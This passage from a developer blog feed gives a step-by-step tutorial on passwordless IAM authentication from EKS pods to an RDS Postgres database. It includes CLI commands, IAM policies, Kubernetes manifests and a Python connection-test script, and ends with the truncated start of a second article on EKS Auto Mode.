class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqs54e46j2goxk9wstgmt.webp" alt=" " width="800" height="336"></a></p> <h2> The setup </h2> <p>This article is going to focus on applications running in Elastic Kubernetes Service (EKS) in AWS. Of course, the same approach can be used to allow connections from other compute resources -- whether that’s a plain EC2 instance or an ECS container -- but the details will differ slightly. For example, instead of a Pod Identity Association for an EKS pod, an EC2 instance will need an Instance Profile.</p> <p>Since the second part of the connection is the database, we’re going to use an RDS database -- specifically Postgres, though it can be any other you prefer. And, of course, the glue that ties it all together will be the IAM roles and policies.</p> <h2> Setting up the database </h2> <p>To access the database using an IAM role, we first have to allow this type of connection. It doesn’t matter if your database is already running or if you’re creating a new one -- this setting can be enabled at any time.</p> <p>This setting requires a database restart, so keep that in mind.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs232xnrbbp0o3oq8mrbl.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs232xnrbbp0o3oq8mrbl.webp" alt="image description: Database authentication" width="800" height="144"></a></p> <p>For my fellow CLI enjoyers, here’s how you can do it with the <code>awscli</code> tool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># creating a new cluster</span> aws rds create-db-cluster <span class="se">\</span> <span class="nt">--db-cluster-identifier</span> my-test-cluster <span class="se">\</span> <span class="nt">--engine</span> aurora-postgresql <span class="se">\</span> <span class="nt">--enable-iam-database-authentication</span> <span class="c"># modifying an existing cluster</span> aws rds modify-db-cluster <span class="se">\</span> <span class="nt">--db-cluster-identifier</span> my-test-cluster <span class="se">\</span> <span class="nt">--enable-iam-database-authentication</span> </code></pre> </div> <p>After enabling this setting (and applying it), we can continue with the setup.</p> <p>What do we need to connect to the database? That’s right -- the user! Let’s create one. For simplicity, let's call it <code>database_user</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">USER</span> <span class="n">database_user</span><span class="p">;</span> <span class="k">GRANT</span> <span class="n">rds_iam</span> <span class="k">TO</span> <span class="n">database_user</span><span class="p">;</span> </code></pre> </div> <p>The second clause grants <code>database_user</code> the ability to access RDS via IAM roles.</p> <h2> Creating a policy and role </h2> <p>An IAM role is the entry ticket that allows the application to connect to the database. It’s very important to configure it properly. By properly, I mean not only correctly -- which is, of course, crucial -- but also with the necessary permissions kept to a bare minimum. The famous Principle of Least Privilege in action.</p> <p>The main policy should look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"rds-db:connect"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"arn:aws:rds-db:us-west-2:123456789012:dbuser:cluster-ABCDEFGHIJKL01234/database_user"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>A few things to notice here:</p> <ul> <li>The <code>/database_user</code> at the end of the resource string indicates that this policy is meant only for this particular user.</li> <li>The permission <code>rds-db:connect</code> differs from regular <code>rds:*</code> permissions, as it is responsible only for granting the ability to connect to the database as the designated user. You can see for yourself -- there’s only <a href="https://www.awsiamactions.io/?o=rds-db" rel="noopener noreferrer">one</a> such action.</li> <li>The resource ARN includes a <code>:cluster-ABCDEFGHIJKL01234/</code> reference, which allows the connection to the cluster in general. It can also reference a specific database with an ID like <code>:db-ABCDEFGHIJKL01234/</code>, or even an <a href="https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/rds-proxy-setup.html" rel="noopener noreferrer">RDS Proxy</a> with an identifier like <code>:prx-ABCDEFGHIJKL01234/</code>.</li> </ul> <p>The policy can utilize wildcards as well, providing various options:</p> <ul> <li>The policy can allow any user to access a specific database using the resource <code>arn:aws:rds-db:us-west-2:123456789012:dbuser:cluster-ABCDEFGHIJKL01234/*</code>.</li> <li>The policy can allow a particular user to access any database in any region: <code>arn:aws:rds-db:*:123456789012:dbuser:*/database_user</code>.</li> <li>The policy can also allow anyone to connect to any database: <code>arn:aws:rds-db:us-west-2:123456789012:dbuser:*/*</code>.</li> </ul> <p>The possibilities are vast, but one must always be mindful of overly broad permissions -- it’s a <a href="https://notes.hatedabamboo.me/the-big-iam-challenge/" rel="noopener noreferrer">security concern</a> first and foremost.</p> <p>Okay, that’s enough about the role policy.</p> <p>The second part of setting up the correct role for the application is the Assume Role Policy -- the configuration that allows a particular actor to assume that role. This is the policy that appears on the "Trust relationships" tab on the role page.</p> <p>As mentioned above, this article focuses on accessing the database from EKS pods. For this specific case, the assume role policy will look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pods.eks.amazonaws.com"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"sts:AssumeRole"</span><span class="p">,</span><span class="w"> </span><span class="s2">"sts:TagSession"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Basically, we allow pods from EKS to assume the role and tag the session.</p> <p>And that’s that!</p> <h2> Configuring Pod Identity Associations </h2> <p>Pod Identity Association is a convenient AWS-native way to assign an IAM role to a pod in a specific namespace by associating the role with a service account. This acts like an EC2 Instance Profile.</p> <p>Assuming you have an existing EKS cluster, head to the "Access" tab and find the "Pod Identity Associations" block. Click the "Create" button and proceed with the creation.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fikxtwd282b0ssehcziad.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fikxtwd282b0ssehcziad.webp" alt="image description: Pod identity association" width="800" height="299"></a></p> <p>In the first "IAM role" field, select the role you created in the previous step. "Target IAM role" is a new feature that allows for nested permission grants -- slightly confusing, if you ask me, but sometimes helpful. "Kubernetes namespace" is the namespace in which we will allow the pod to assume the role. Finally, "Kubernetes service account" is the name of the service account that will be associated with the desired role.</p> <p>Click "Create" one more time -- and we’re done here. Let’s move on to the penultimate part: Kubernetes tickling.</p> <h2> Configuring Kubernetes ServiceAccount and workload </h2> <p>A ServiceAccount is a pretty simple Kubernetes resource. Its manifest should look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">ServiceAccount</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">my-rds-sa</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">rds-app</span> </code></pre> </div> <p>Keep in mind that the name of the service account and namespace should match exactly what was used in the previous step; otherwise, the pod identity won’t be able to assume the role.</p> <p>Now, for the actual workload.</p> <p>This can be a simple <code>awscli</code> + <code>psql</code> connection test, or a full-scale application, for example written in Python. I’ll go with the second approach, since it’s more interesting and handles the necessary authorization and authentication steps in a single application.</p> <p>For the Python app, we can create a simple pod:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Pod</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">rds-app-testing</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">rds-app</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">serviceAccountName</span><span class="pi">:</span> <span class="s">my-rds-sa</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">python-container</span> <span class="na">image</span><span class="pi">:</span> <span class="s">python:3.11-slim</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">/bin/bash"</span><span class="pi">]</span> <span class="na">args</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">-c"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">pip</span><span class="nv"> </span><span class="s">install</span><span class="nv"> </span><span class="s">boto3</span><span class="nv"> </span><span class="s">psycopg2-binary</span><span class="nv"> </span><span class="s">&amp;&amp;</span><span class="nv"> </span><span class="s">sleep</span><span class="nv"> </span><span class="s">infinity"</span><span class="pi">]</span> <span class="na">stdin</span><span class="pi">:</span> <span class="kc">true</span> <span class="na">tty</span><span class="pi">:</span> <span class="kc">true</span> <span class="na">volumeMounts</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">tmp-storage</span> <span class="na">mountPath</span><span class="pi">:</span> <span class="s">/tmp</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">tmp-storage</span> <span class="na">emptyDir</span><span class="pi">:</span> <span class="pi">{}</span> <span class="na">restartPolicy</span><span class="pi">:</span> <span class="s">Always</span> </code></pre> </div> <p>In this manifest, we spin up a pod with Python 3.11, installing the necessary libraries (<code>boto3</code> and <code>psycopg2-binary</code>, since we need to connect to the AWS API and the Postgres database) and then put it to sleep. This allows us to connect to the pod via shell and execute the script that will help us perform the testing.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">boto3</span> <span class="kn">import</span> <span class="n">psycopg2</span> <span class="kn">import</span> <span class="n">os</span> <span class="n">ENDPOINT</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">RDS_ENDPOINT</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">your-rds-endpoint.region.rds.amazonaws.com</span><span class="sh">'</span><span class="p">)</span> <span class="n">PORT</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">RDS_PORT</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">5432</span><span class="sh">'</span><span class="p">))</span> <span class="n">USER</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">DB_USER</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">database_user</span><span class="sh">'</span><span class="p">)</span> <span class="n">DBNAME</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">DB_NAME</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">your-database-name</span><span class="sh">'</span><span class="p">)</span> <span class="n">REGION</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">AWS_REGION</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">us-west-2</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">test_rds_connection</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="bp">None</span> <span class="k">try</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🔐 Generating RDS auth token for user: </span><span class="si">{</span><span class="n">USER</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">📍 Endpoint: </span><span class="si">{</span><span class="n">ENDPOINT</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">PORT</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🗄️ Database: </span><span class="si">{</span><span class="n">DBNAME</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🌍 Region: </span><span class="si">{</span><span class="n">REGION</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">-</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">50</span><span class="p">)</span> <span class="n">client</span> <span class="o">=</span> <span class="n">boto3</span><span class="p">.</span><span class="nf">client</span><span class="p">(</span><span class="sh">'</span><span class="s">rds</span><span class="sh">'</span><span class="p">,</span> <span class="n">region_name</span><span class="o">=</span><span class="n">REGION</span><span class="p">)</span> <span class="n">token</span> <span class="o">=</span> <span class="n">client</span><span class="p">.</span><span class="nf">generate_db_auth_token</span><span class="p">(</span> <span class="n">DBHostname</span><span class="o">=</span><span class="n">ENDPOINT</span><span class="p">,</span> <span class="n">Port</span><span class="o">=</span><span class="n">PORT</span><span class="p">,</span> <span class="n">DBUsername</span><span class="o">=</span><span class="n">USER</span> <span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">✅ Auth token generated successfully</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🔗 Attempting to connect to RDS...</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">psycopg2</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span> <span class="n">host</span><span class="o">=</span><span class="n">ENDPOINT</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="n">PORT</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="n">USER</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">token</span><span class="p">,</span> <span class="n">database</span><span class="o">=</span><span class="n">DBNAME</span><span class="p">,</span> <span class="n">sslmode</span><span class="o">=</span><span class="sh">'</span><span class="s">require</span><span class="sh">'</span> <span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">✅ Connected to RDS successfully!</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">📋 Running connection tests...</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT version();</span><span class="sh">"</span><span class="p">)</span> <span class="n">version</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🐘 PostgreSQL Version: </span><span class="si">{</span><span class="n">version</span><span class="p">[</span><span class="si">:</span><span class="mi">50</span><span class="p">]</span><span class="si">}</span><span class="s">...</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT NOW();</span><span class="sh">"</span><span class="p">)</span> <span class="n">current_time</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🕒 Database Time: </span><span class="si">{</span><span class="n">current_time</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT current_database(), current_user, inet_server_addr(), inet_server_port();</span><span class="sh">"</span><span class="p">)</span> <span class="n">db_info</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🗄️ Database: </span><span class="si">{</span><span class="n">db_info</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">👤 Connected as: </span><span class="si">{</span><span class="n">db_info</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🌐 Server IP: </span><span class="si">{</span><span class="n">db_info</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🔌 Server Port: </span><span class="si">{</span><span class="n">db_info</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Check if we can create/drop a test table </span> <span class="k">try</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">CREATE TABLE IF NOT EXISTS connection_test (id SERIAL PRIMARY KEY, test_time TIMESTAMP DEFAULT NOW());</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">INSERT INTO connection_test DEFAULT VALUES;</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT COUNT(*) FROM connection_test;</span><span class="sh">"</span><span class="p">)</span> <span class="n">count</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">📝 Test table record count: </span><span class="si">{</span><span class="n">count</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">DROP TABLE IF EXISTS connection_test;</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🧹 Test table cleaned up</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="n">psycopg2</span><span class="p">.</span><span class="n">Error</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">⚠️ Table test skipped (insufficient permissions): </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">🎉 All connection tests passed successfully!</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">except</span> <span class="n">boto3</span><span class="p">.</span><span class="n">exceptions</span><span class="p">.</span><span class="n">Boto3Error</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">❌ AWS/Boto3 Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">except</span> <span class="n">psycopg2</span><span class="p">.</span><span class="n">OperationalError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">❌ PostgreSQL Connection Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">except</span> <span class="n">psycopg2</span><span class="p">.</span><span class="n">Error</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">❌ PostgreSQL Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">❌ Unexpected Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">finally</span><span class="p">:</span> <span class="k">if</span> <span class="n">conn</span><span class="p">:</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🔒 Database connection closed</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">check_aws_credentials</span><span class="p">():</span> <span class="sh">"""</span><span class="s">Check if AWS credentials are working</span><span class="sh">"""</span> <span class="k">try</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🔍 Checking AWS credentials...</span><span class="sh">"</span><span class="p">)</span> <span class="n">sts</span> <span class="o">=</span> <span class="n">boto3</span><span class="p">.</span><span class="nf">client</span><span class="p">(</span><span class="sh">'</span><span class="s">sts</span><span class="sh">'</span><span class="p">)</span> <span class="n">identity</span> <span class="o">=</span> <span class="n">sts</span><span class="p">.</span><span class="nf">get_caller_identity</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">✅ AWS Identity: </span><span class="si">{</span><span class="n">identity</span><span class="p">[</span><span class="sh">'</span><span class="s">Arn</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">👤 User/Role: </span><span class="si">{</span><span class="n">identity</span><span class="p">[</span><span class="sh">'</span><span class="s">UserId</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">🏢 Account: </span><span class="si">{</span><span class="n">identity</span><span class="p">[</span><span class="sh">'</span><span class="s">Account</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">❌ AWS Credentials Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s"> - Check if Pod Identity association is configured</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s"> - Verify service account is correctly assigned to pod</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🚀 Starting RDS Connection Test</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">=</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">50</span><span class="p">)</span> <span class="k">if</span> <span class="nf">check_aws_credentials</span><span class="p">():</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="sh">"</span> <span class="o">+</span> <span class="sh">"</span><span class="s">=</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">50</span><span class="p">)</span> <span class="nf">test_rds_connection</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">❌ Cannot proceed without valid AWS credentials</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="sh">"</span> <span class="o">+</span> <span class="sh">"</span><span class="s">=</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">50</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🏁 Test completed</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>This is an extremely over-engineered script that, nevertheless, does its job -- it helps verify that the permissions are set correctly and the connection is working.</p> <p>The output of the script will look something like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>🚀 Starting RDS Connection Test <span class="o">==================================================</span> 🔍 Checking AWS credentials... ✅ AWS Identity: &lt;user-arn&gt; 👤 User/Role: &lt;role-id&gt; 🏢 Account: &lt;account-id&gt; <span class="o">==================================================</span> 🔐 Generating RDS auth token <span class="k">for </span>user: database_user 📍 Endpoint: your-rds-endpoint.region.rds.amazonaws.com:5432 🗄️ Database: your-database-name 🌍 Region: us-west-2 <span class="nt">--------------------------------------------------</span> ✅ Auth token generated successfully 🔗 Attempting to connect to RDS... ✅ Connected to RDS successfully! 📋 Running connection tests... 🐘 PostgreSQL Version: PostgreSQL 17.4 on aarch64-unknown-linux-gnu, comp... 🕒 Database Time: 2025-08-28 13:48:28.303720+00:00 🗄️ Database: your-database-name 👤 Connected as: database_user 🌐 Server IP: 10.0.100.200 🔌 Server Port: 5432 🎉 All connection tests passed successfully! 🔒 Database connection closed <span class="o">==================================================</span> 🏁 Test completed </code></pre> </div> <p>While not performing any meaningful actions, this script helps us understand if all of our preparations were successful.</p> <p>To use the same approach in an actual business application, you need to perform one extra step compared with a regular connection: acquire a database access token via the <code>generate_db_auth_token()</code> method and use this token as the password in the connection settings.</p> <h2> Afterthought </h2> <p>While working on this article, I kept asking myself: "Who may need this if it’s all available in the documentation?" Technically correct, but AWS documentation tends to separate connected topics into different articles, making it harder to compile a coherent manual for performing a certain action. Here, you have everything you need in one place, from start to finish, guiding you along the way.</p> <p>Why is this approach good? For several reasons:</p> <p>Abolishing password-based authorization removes this vector of attack. It also offloads password management tasks: no rotation, no revoking, nothing.</p> <p>Using IAM roles and policies for authorization allows you to leverage the power of the IaC approach, keeping policies transparent, consistent, and accessible for static code analysis tools and audits. Apart from all that, assuming an IAM role means that sessions are actually short-lived, which increases the security of the connection. Security above all!</p> <p> <a href="mailto:reply@hatedabamboo.me?subject=Reply%20to%3A%20Kubernetes%20to%20RDS%3A%20Secure%20Connections%20via%20IAM%20Roles%20Without%20Passwords">Reply to this post ✉️</a> </p> aws eks kubernetes rds EKS Auto Mode custom NodeClasses and NodePools Kirill Sat, 16 Aug 2025 16:44:49 +0000 https://dev.to/aws-builders/eks-auto-mode-custom-nodeclasses-and-nodepools-6fb https://dev.to/aws-builders/eks-auto-mode-custom-nodeclasses-and-nodepools-6fb <p>Hello, dear reader! It's been a while since our last one-way communication. Mostly because the last couple of months have been taxing on me. Searching for<br> a new job is not an easy task these days. Also, there’s been a new <a href="https://www.warhammer-community.com/en-gb/articles/ujwwshq1/saturday-pre-orders-saturnine/" rel="noopener noreferrer">Warhammer box</a>,<br> which I just couldn’t resist.</p> <p>But I'm slowly getting back up to speed, and today we're gonna explore the abilities to manage the managed service -- in particular, how we can configure custom parameters to spin up instances and storage on AWS EKS to our liking.</p> <h2> EKS Auto Mode </h2> <p>EKS (Elastic Kubernetes Service) is an AWS-managed Kubernetes service that takes over control plane operations and cluster maintenance from users, leaving only application management<sup id="fnref1">1</sup>. This comes at a cost of $0.10 per cluster per hour ($0.60 